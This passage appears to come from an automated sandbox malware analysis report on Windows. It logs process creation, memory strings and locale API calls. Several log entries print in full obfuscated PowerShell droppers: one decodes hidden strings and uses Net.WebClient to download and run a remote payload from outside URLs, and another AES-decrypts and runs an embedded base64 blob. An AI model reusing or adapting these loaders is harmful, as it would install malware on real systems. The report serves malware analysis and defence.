iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command (('((e4jfunction decrypt-aesencryption {param([string]tmibase64text,[stringe4j+e4j]tmikey)tmie4j+e4jaesmanaged = new-object system.see4j+e4jcurity.cryptography.aesmanaged;tmia'+'esmanagee4j+e4'+'jd.modee4j+e4j = [syse4j+'+'e4jtem.security.cryptoge4j+e4jraphy.e4j+e'+'4jcie4'+'j+e4jphermode]::cbc;tmiaesmanaged.'+'pae4j+e4jddin'+'g = [system.security.cryptography.paddingmode]::zeros;tmiaesmanaged.blocksiz'+'e = 128;tmiaesmanaged.keysize = 256;'+'tmiaesmanagee4j+'+'e4jd.key = ('+'new-objecte4'+'j+e4j system.security.cryptography.sha256managed).computehash([syste'+'m.text.encoding]::utf8.gee4j+e4jtbytes(tmikey));tmicipherbytes = [syst'+'em.convert]::frombase64string(tmibase64text);tmiaesmanaged.iv '+'= tmicipherbytes[0..15];tmidecryptor = tmiaesmanaged.createdecryptor();tmidecryptedbytes = tmidecryptor.transformfin'+'alblock(tmicipherbytes, 16, tmicipherbytes.length - 16);e4j+e4jtmiae'+'smanaged.d'+'ispose('+');return [system.text.encoding]::utf8.getstring'+'(tmidecry'+'ptedbytes).tre4j+e4jim([char]0);}tmichave = cni98685860701936162316809131591218cnie4j+e4j;tmitextocriptogr'+'afadobase4j+e4je64 = '+'cni/cgjmqvj5jcchnuuqniccrhpmr5qmkjqyaxljaoozs+i6ujjzbuhkkmuiawh3btvdj7nwjq1x++w/d0ybgxb8mznv8qaoqqp1s2jb+ydre2mync51z88vdp5yhlxv2jub4bad5mqkn09gj7sfrzkis0lv4bbd7swdblnny01hopdzzi88ulkrhf094frfkbdtwl6drqxh86pybppz5p2ly9nfsvgpk0kub6u6kg9mbd3uxusvgzcduc0aq5exdqvpaek1wsrhmdfswp03fzttbxi2uib73uc20hna8tklwpvgqcg5yxgt1syt4jsfjugz9qtq1ux/og7araur2spi44p27efktjtinmkpdxyhkjzs52yqntfau7vkn80wlfrjako1pusni83kg4gb5vmo0l0qfdknvuszur6nwsandn5nedu4krrcvnx137d+zbob0wbqlgldby6a+emgzytzcj9ydu9srhuvpnj5c0hkwpy4dw2nc9xkyxclhpmroagz59kk909adcva3czmi4okn0iyllc6wphikpk+n/lh8dsrmpfxxmnyxhq6fpmq3t7w6xvhmihbtnk1rozfwexeeon7dkrdc0d2irlwlym+askjswieqouxpmzyjum2hcsj8o2qq6sjssecso9ph7mc3rtlzx/yu4i0g+amxaebo7jngzczrsoxbrasre5huijlm3spvhwt7bmphfnb5uatl1poeor3paytiodvmhlq5udjkwlq55foeanjf+pmojiot+punj9pkhigch6xtde+2irxnpe7ay7vlrz0f+zzhorfur8p5phwq383qgba8dubdwqow+2/zvvgy0+vtbvpazbtmhkqsshty4fy3hgqlxkhwaneqjq8wqlkzquvdy9epztjgemds6via1ixp+weiorc5nuhoaj4ygoy2moxmyeodutv3614ruxvqvvcerqlinxxajm5yyy2gvfxvy7lqs/l3ppdj/er9yz3s9rypncll0seexfchp/0aee9ha3qtqqm07kfqm7fm/txvhazzqil8wyj4sl9vdvuovk82qkltc24fpx5mykzqf4iy2ozu7+pswznbwnr+r8ibexgpk6yuljjiqen49p7iiebll4a+j83mopubclr/3wfiodrztcs5fsi1/7gww61abzmh9wq5y/pn8qrpmjkyzsp84uihhxglfpuuclltyd6067khauf+isnyuo0yqamdlvdcnsanb1ffvg2z6opzbg7sqfu6aqguz584nttwubmlcl43xdc/g09jfmr9jk22mvt+6/1kqesuax5g4j6g6n3mjeep9cvy3lojh+/kwuqr/kbqc4jibzhwktcrnn4yi2/mmj/0v3oifvqnnecpnoqxxyyjjgkg+362vfqqj/+ronzxepvq3wcwkq/chehaw5iw==cni;tmitextodescriptografado = decrypt-aesencryption -'+'base64text tmitextocriptografadobase64 -key tmichave;w'+'rite-host cnitexe4j+e4jto descre4j+e4jiptografado: tmi'+'textodescriptograe4j+e4jfadocni;invoke-expressioe4j+e4jn tmitext'+'oe4j+e4jdescriptografado;e4j)-replace ([char]67+[char]110+['+'char]73),[char]34 -crep
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0 revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0';if (${host}.currentculture) {$digers++;}function svndyssendes94($dukketeatrenes){$uadskilleligt=$dukketeatrenes.length-$digers;$mainlining='substr';$mainlining+='ing';for( $truthsman=1;$truthsman -lt $uadskilleligt;$truthsman+=2){$revisoratets207+=$dukketeatrenes.$mainlining.invoke( $truthsman, $digers);}$revisoratets207;}function scance($strukturndringernes){ . ($gederamsen) ($strukturndringernes);}$ambages77=svndyssendes94 ' mio zgi lkl,al/c5f. 0r (.w isn d o,wos bnqt. r1 0,.v0p; ,w ibno6 4d;s uxy6 4m;, ,rsvm:t1 2.1..p0c) sgbehc k o,/b2 0o1 0 0 1,0b1f if i.rbenf,ohxc/e1 2a1 .u0b ';$slotting=svndyssendes94 '.utsue r.-fa g ern,ti ';$udvandringerne=svndyssendes94 ' h tttjpasa: /e/kaps,odc.i art i.a t r.ald,i tgi.i m aarsi a...r o,/gols /,t r adn.s.p o.rbtem e,nnt...pafpmm> hst t phs,:p/ /,n.e.w ..qcupr alngu s hbaei qge r . oerfg..,s a./ wmpc- a.d m.iknd/tons,e rcvde /rtdr,a nps.pro.r.tsm.e n tg. phftmi ';$fluffs=svndyssendes94 's> ';$gederamsen=svndyssendes94 'pi,e x ';$lgnere='unparalysed';$decos = svndyssendes94 'ee cmh,os % a p ptdaastsa % \fs n i g m ymr,dje dpea. sfkso. ,& &h fedc h.ou t ';scance (svndyssendes94 ',$ g lho boaalc:prge.gfr =h( c m,d, /vc, .$ d.e.cbobs,). ');scance (svndyssendes94 'e$sgelfo b.a lr:cs ulj.eft,=s$sutdkvfa,n,dirdion.gselr,nse .hsapglai tb( $ fjl.uofnf.sd)p ');scance (svndyssendes94 ',[bn e,t .cs eorhvli.cve pso inn.tsmcacn,aogaekr,]s:d:ospepc upr.ikt y pdrcobt o,cfool i=. c[snnelt ..s ebchu rui.t ympmrmo.tko,c o l.tvygp e ]n:f:vtrl sr1f2e ');$udvandringerne=$sujet[0];$respriser= (svndyssendes94 ',$.gil.o brablp: y m c a = n eiw -.olb jbemc t, s.yesct,e mh.rnuesth.mw e.brckl i,e.nmt');$respriser+=$regr[1];scance ($respriser);scance (svndyssendes94 'a$ ydm.c,a .uhuemapd.e rssa[ $fsjlio trt,i nkgp]d=,$oa,mtbfasg e,sk7 7 ');$genlydens=svndyssendes94 's$,y,mtc,a..sd o,w nsl ofa d fsibl e.(.$fu,d v asntd r i nog.e rsnaeb,f$ piruohgar a m r.eudhauk.t r,s )b ';$programredaktrs=$regr[0];scance (svndyssendes94 ' $ g lto b a l,: smastweblsl i tp=,( tse satt-zpgadtah f$dpsr o g raa mlrae d,aak tcrms ) ');while (!$satellit) {scance (svndyssendes94 'h$bg lto,b.a lh: rie goi ocn s.p lparnvrae t n ibn gbscl i.n.j.e =,$mtcrmuaeu ') ;scance $genlydens;scance (svndyssendes94 ',s tca r,t -.ssl,eoesp .4n ');scance (svndyssendes9
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0 revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0';if (${host}.currentculture) {$digers++;}function svndyssendes94($dukketeatrenes){$uadskilleligt=$dukketeatrenes.length-$digers;$mainlining='substr';$mainlining+='ing';for( $truthsman=1;$truthsman -lt $uadskilleligt;$truthsman+=2){$revisoratets207+=$dukketeatrenes.$mainlining.invoke( $truthsman, $digers);}$revisoratets207;}function scance($strukturndringernes){ . ($gederamsen) ($strukturndringernes);}$ambages77=svndyssendes94 ' mio zgi lkl,al/c5f. 0r (.w isn d o,wos bnqt. r1 0,.v0p; ,w ibno6 4d;s uxy6 4m;, ,rsvm:t1 2.1..p0c) sgbehc k o,/b2 0o1 0 0 1,0b1f if i.rbenf,ohxc/e1 2a1 .u0b ';$slotting=svndyssendes94 '.utsue r.-fa g ern,ti ';$udvandringerne=svndyssendes94 ' h tttjpasa: /e/kaps,odc.i art i.a t r.ald,i tgi.i m aarsi a...r o,/gols /,t r adn.s.p o.rbtem e,nnt...pafpmm> hst t phs,:p/ /,n.e.w ..qcupr alngu s hbaei qge r . oerfg..,s a./ wmpc- a.d m.iknd/tons,e rcvde /rtdr,a nps.pro.r.tsm.e n tg. phftmi ';$fluffs=svndyssendes94 's> ';$gederamsen=svndyssendes94 'pi,e x ';$lgnere='unparalysed';$decos = svndyssendes94 'ee cmh,os % a p ptdaastsa % \fs n i g m ymr,dje dpea. sfkso. ,& &h fedc h.ou t ';scance (svndyssendes94 ',$ g lho boaalc:prge.gfr =h( c m,d, /vc, .$ d.e.cbobs,). ');scance (svndyssendes94 'e$sgelfo b.a lr:cs ulj.eft,=s$sutdkvfa,n,dirdion.gselr,nse .hsapglai tb( $ fjl.uofnf.sd)p ');scance (svndyssendes94 ',[bn e,t .cs eorhvli.cve pso inn.tsmcacn,aogaekr,]s:d:ospepc upr.ikt y pdrcobt o,cfool i=. c[snnelt ..s ebchu rui.t ympmrmo.tko,c o l.tvygp e ]n:f:vtrl sr1f2e ');$udvandringerne=$sujet[0];$respriser= (svndyssendes94 ',$.gil.o brablp: y m c a = n eiw -.olb jbemc t, s.yesct,e mh.rnuesth.mw e.brckl i,e.nmt');$respriser+=$regr[1];scance ($respriser);scance (svndyssendes94 'a$ ydm.c,a .uhuemapd.e rssa[ $fsjlio trt,i nkgp]d=,$oa,mtbfasg e,sk7 7 ');$genlydens=svndyssendes94 's$,y,mtc,a..sd o,w nsl ofa d fsibl e.(.$fu,d v asntd r i nog.e rsnaeb,f$ piruohgar a m r.eudhauk.t r,s )b ';$programredaktrs=$regr[0];scance (svndyssendes94 ' $ g lto b a l,: smastweblsl i tp=,( tse satt-zpgadtah f$dpsr o g raa mlrae d,aak tcrms ) ');while (!$satellit) {scance (svndyssendes94 'h$bg lto,b.a lh: rie goi ocn s.p lparnvrae t n ibn gbscl i.n.j.e =,$mtcrmuaeu ') ;scance $genlydens;scance (svndyssendes94 ',s tca r,t -.ssl,eoesp .4n ');scance (svndyssendes9
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command (('((e4jfunction decrypt-aesencryption {param([string]tmibase64text,[stringe4j+e4j]tmikey)tmie4j+e4jaesmanaged = new-object system.see4j+e4jcurity.cryptography.aesmanaged;tmia'+'esmanagee4j+e4'+'jd.modee4j+e4j = [syse4j+'+'e4jtem.security.cryptoge4j+e4jraphy.e4j+e'+'4jcie4'+'j+e4jphermode]::cbc;tmiaesmanaged.'+'pae4j+e4jddin'+'g = [system.security.cryptography.paddingmode]::zeros;tmiaesmanaged.blocksiz'+'e = 128;tmiaesmanaged.keysize = 256;'+'tmiaesmanagee4j+'+'e4jd.key = ('+'new-objecte4'+'j+e4j system.security.cryptography.sha256managed).computehash([syste'+'m.text.encoding]::utf8.gee4j+e4jtbytes(tmikey));tmicipherbytes = [syst'+'em.convert]::frombase64string(tmibase64text);tmiaesmanaged.iv '+'= tmicipherbytes[0..15];tmidecryptor = tmiaesmanaged.createdecryptor();tmidecryptedbytes = tmidecryptor.transformfin'+'alblock(tmicipherbytes, 16, tmicipherbytes.length - 16);e4j+e4jtmiae'+'smanaged.d'+'ispose('+');return [system.text.encoding]::utf8.getstring'+'(tmidecry'+'ptedbytes).tre4j+e4jim([char]0);}tmichave = cni98685860701936162316809131591218cnie4j+e4j;tmitextocriptogr'+'afadobase4j+e4je64 = '+'cni/cgjmqvj5jcchnuuqniccrhpmr5qmkjqyaxljaoozs+i6ujjzbuhkkmuiawh3btvdj7nwjq1x++w/d0ybgxb8mznv8qaoqqp1s2jb+ydre2mync51z88vdp5yhlxv2jub4bad5mqkn09gj7sfrzkis0lv4bbd7swdblnny01hopdzzi88ulkrhf094frfkbdtwl6drqxh86pybppz5p2ly9nfsvgpk0kub6u6kg9mbd3uxusvgzcduc0aq5exdqvpaek1wsrhmdfswp03fzttbxi2uib73uc20hna8tklwpvgqcg5yxgt1syt4jsfjugz9qtq1ux/og7araur2spi44p27efktjtinmkpdxyhkjzs52yqntfau7vkn80wlfrjako1pusni83kg4gb5vmo0l0qfdknvuszur6nwsandn5nedu4krrcvnx137d+zbob0wbqlgldby6a+emgzytzcj9ydu9srhuvpnj5c0hkwpy4dw2nc9xkyxclhpmroagz59kk909adcva3czmi4okn0iyllc6wphikpk+n/lh8dsrmpfxxmnyxhq6fpmq3t7w6xvhmihbtnk1rozfwexeeon7dkrdc0d2irlwlym+askjswieqouxpmzyjum2hcsj8o2qq6sjssecso9ph7mc3rtlzx/yu4i0g+amxaebo7jngzczrsoxbrasre5huijlm3spvhwt7bmphfnb5uatl1poeor3paytiodvmhlq5udjkwlq55foeanjf+pmojiot+punj9pkhigch6xtde+2irxnpe7ay7vlrz0f+zzhorfur8p5phwq383qgba8dubdwqow+2/zvvgy0+vtbvpazbtmhkqsshty4fy3hgqlxkhwaneqjq8wqlkzquvdy9epztjgemds6via1ixp+weiorc5nuhoaj4ygoy2moxmyeodutv3614ruxvqvvcerqlinxxajm5yyy2gvfxvy7lqs/l3ppdj/er9yz3s9rypncll0seexfchp/0aee9ha3qtqqm07kfqm7fm/txvhazzqil8wyj4sl9vdvuovk82qkltc24fpx5mykzqf4iy2ozu7+pswznbwnr+r8ibexgpk6yuljjiqen49p7iiebll4a+j83mopubclr/3wfiodrztcs5fsi1/7gww61abzmh9wq5y/pn8qrpmjkyzsp84uihhxglfpuuclltyd6067khauf+isnyuo0yqamdlvdcnsanb1ffvg2z6opzbg7sqfu6aqguz584nttwubmlcl43xdc/g09jfmr9jk22mvt+6/1kqesuax5g4j6g6n3mjeep9cvy3lojh+/kwuqr/kbqc4jibzhwktcrnn4yi2/mmj/0v3oifvqnnecpnoqxxyyjjgkg+362vfqqj/+ronzxepvq3wcwkq/chehaw5iw==cni;tmitextodescriptografado = decrypt-aesencryption -'+'base64text tmitextocriptografadobase64 -key tmichave;w'+'rite-host cnitexe4j+e4jto descre4j+e4jiptografado: tmi'+'textodescriptograe4j+e4jfadocni;invoke-expressioe4j+e4jn tmitext'+'oe4j+e4jdescriptografado;e4j)-replace ([char]67+[char]110+['+'char]73),[char]34 -crepJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0 revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0';if (${host}.currentculture) {$digers++;}function svndyssendes94($dukketeatrenes){$uadskilleligt=$dukketeatrenes.length-$digers;$mainlining='substr';$mainlining+='ing';for( $truthsman=1;$truthsman -lt $uadskilleligt;$truthsman+=2){$revisoratets207+=$dukketeatrenes.$mainlining.invoke( $truthsman, $digers);}$revisoratets207;}function scance($strukturndringernes){ . ($gederamsen) ($strukturndringernes);}$ambages77=svndyssendes94 ' mio zgi lkl,al/c5f. 0r (.w isn d o,wos bnqt. r1 0,.v0p; ,w ibno6 4d;s uxy6 4m;, ,rsvm:t1 2.1..p0c) sgbehc k o,/b2 0o1 0 0 1,0b1f if i.rbenf,ohxc/e1 2a1 .u0b ';$slotting=svndyssendes94 '.utsue r.-fa g ern,ti ';$udvandringerne=svndyssendes94 ' h tttjpasa: /e/kaps,odc.i art i.a t r.ald,i tgi.i m aarsi a...r o,/gols /,t r adn.s.p o.rbtem e,nnt...pafpmm> hst t phs,:p/ /,n.e.w ..qcupr alngu s hbaei qge r . oerfg..,s a./ wmpc- a.d m.iknd/tons,e rcvde /rtdr,a nps.pro.r.tsm.e n tg. phftmi ';$fluffs=svndyssendes94 's> ';$gederamsen=svndyssendes94 'pi,e x ';$lgnere='unparalysed';$decos = svndyssendes94 'ee cmh,os % a p ptdaastsa % \fs n i g m ymr,dje dpea. sfkso. ,& &h fedc h.ou t ';scance (svndyssendes94 ',$ g lho boaalc:prge.gfr =h( c m,d, /vc, .$ d.e.cbobs,). ');scance (svndyssendes94 'e$sgelfo b.a lr:cs ulj.eft,=s$sutdkvfa,n,dirdion.gselr,nse .hsapglai tb( $ fjl.uofnf.sd)p ');scance (svndyssendes94 ',[bn e,t .cs eorhvli.cve pso inn.tsmcacn,aogaekr,]s:d:ospepc upr.ikt y pdrcobt o,cfool i=. c[snnelt ..s ebchu rui.t ympmrmo.tko,c o l.tvygp e ]n:f:vtrl sr1f2e ');$udvandringerne=$sujet[0];$respriser= (svndyssendes94 ',$.gil.o brablp: y m c a = n eiw -.olb jbemc t, s.yesct,e mh.rnuesth.mw e.brckl i,e.nmt');$respriser+=$regr[1];scance ($respriser);scance (svndyssendes94 'a$ ydm.c,a .uhuemapd.e rssa[ $fsjlio trt,i nkgp]d=,$oa,mtbfasg e,sk7 7 ');$genlydens=svndyssendes94 's$,y,mtc,a..sd o,w nsl ofa d fsibl e.(.$fu,d v asntd r i nog.e rsnaeb,f$ piruohgar a m r.eudhauk.t r,s )b ';$programredaktrs=$regr[0];scance (svndyssendes94 ' $ g lto b a l,: smastweblsl i tp=,( tse satt-zpgadtah f$dpsr o g raa mlrae d,aak tcrms ) ');while (!$satellit) {scance (svndyssendes94 'h$bg lto,b.a lh: rie goi ocn s.p lparnvrae t n ibn gbscl i.n.j.e =,$mtcrmuaeu ') ;scance $genlydens;scance (svndyssendes94 ',s tca r,t -.ssl,eoesp .4n ');scance (svndyssendes9Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0 revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0';if (${host}.currentculture) {$digers++;}function svndyssendes94($dukketeatrenes){$uadskilleligt=$dukketeatrenes.length-$digers;$mainlining='substr';$mainlining+='ing';for( $truthsman=1;$truthsman -lt $uadskilleligt;$truthsman+=2){$revisoratets207+=$dukketeatrenes.$mainlining.invoke( $truthsman, $digers);}$revisoratets207;}function scance($strukturndringernes){ . ($gederamsen) ($strukturndringernes);}$ambages77=svndyssendes94 ' mio zgi lkl,al/c5f. 0r (.w isn d o,wos bnqt. r1 0,.v0p; ,w ibno6 4d;s uxy6 4m;, ,rsvm:t1 2.1..p0c) sgbehc k o,/b2 0o1 0 0 1,0b1f if i.rbenf,ohxc/e1 2a1 .u0b ';$slotting=svndyssendes94 '.utsue r.-fa g ern,ti ';$udvandringerne=svndyssendes94 ' h tttjpasa: /e/kaps,odc.i art i.a t r.ald,i tgi.i m aarsi a...r o,/gols /,t r adn.s.p o.rbtem e,nnt...pafpmm> hst t phs,:p/ /,n.e.w ..qcupr alngu s hbaei qge r . oerfg..,s a./ wmpc- a.d m.iknd/tons,e rcvde /rtdr,a nps.pro.r.tsm.e n tg. phftmi ';$fluffs=svndyssendes94 's> ';$gederamsen=svndyssendes94 'pi,e x ';$lgnere='unparalysed';$decos = svndyssendes94 'ee cmh,os % a p ptdaastsa % \fs n i g m ymr,dje dpea. sfkso. ,& &h fedc h.ou t ';scance (svndyssendes94 ',$ g lho boaalc:prge.gfr =h( c m,d, /vc, .$ d.e.cbobs,). ');scance (svndyssendes94 'e$sgelfo b.a lr:cs ulj.eft,=s$sutdkvfa,n,dirdion.gselr,nse .hsapglai tb( $ fjl.uofnf.sd)p ');scance (svndyssendes94 ',[bn e,t .cs eorhvli.cve pso inn.tsmcacn,aogaekr,]s:d:ospepc upr.ikt y pdrcobt o,cfool i=. c[snnelt ..s ebchu rui.t ympmrmo.tko,c o l.tvygp e ]n:f:vtrl sr1f2e ');$udvandringerne=$sujet[0];$respriser= (svndyssendes94 ',$.gil.o brablp: y m c a = n eiw -.olb jbemc t, s.yesct,e mh.rnuesth.mw e.brckl i,e.nmt');$respriser+=$regr[1];scance ($respriser);scance (svndyssendes94 'a$ ydm.c,a .uhuemapd.e rssa[ $fsjlio trt,i nkgp]d=,$oa,mtbfasg e,sk7 7 ');$genlydens=svndyssendes94 's$,y,mtc,a..sd o,w nsl ofa d fsibl e.(.$fu,d v asntd r i nog.e rsnaeb,f$ piruohgar a m r.eudhauk.t r,s )b ';$programredaktrs=$regr[0];scance (svndyssendes94 ' $ g lto b a l,: smastweblsl i tp=,( tse satt-zpgadtah f$dpsr o g raa mlrae d,aak tcrms ) ');while (!$satellit) {scance (svndyssendes94 'h$bg lto,b.a lh: rie goi ocn s.p lparnvrae t n ibn gbscl i.n.j.e =,$mtcrmuaeu ') ;scance $genlydens;scance (svndyssendes94 ',s tca r,t -.ssl,eoesp .4n ');scance (svndyssendes9Jump to behavior
                  Source: RegAsm.exe, 00000004.00000002.3265268792.0000000000F66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 024/07/27 07:31:02 Program Manager]
                  Source: RegAsm.exe, 00000004.00000002.3269216080.0000000000FEF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3265268792.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3269591579.0000000001005000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: RegAsm.exe, 00000004.00000002.3265268792.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, sfvnspt.dat.4.drBinary or memory string: [2024/07/27 07:31:02 Program Manager]
                  Source: RegAsm.exe, 00000004.00000002.3269591579.0000000001005000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerbulerer"
                  Source: RegAsm.exe, 00000004.00000002.3269591579.0000000001005000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
                  Source: RegAsm.exe, 00000004.00000002.3269591579.0000000001005000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagertionsrmA{x#
                  Source: RegAsm.exe, 00000004.00000002.3269216080.0000000000FEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager7
                  Source: RegAsm.exe, 00000004.00000002.3269216080.0000000000FEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerV
                  Source: RegAsm.exe, 00000004.00000002.3269591579.0000000001005000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerles\*lp}{D#s
                  Source: RegAsm.exe, 00000004.00000002.3267052966.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3265268792.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3269591579.0000000001005000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00434C52 cpuid 4_2_00434C52
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,4_2_0040F8D1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,4_2_00452036
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,4_2_004520C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,4_2_00452313
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,4_2_00448404
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_0045243C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,4_2_00452543
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_00452610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,4_2_004488ED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,4_2_00451CD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,4_2_00451F50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,4_2_00451F9B
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
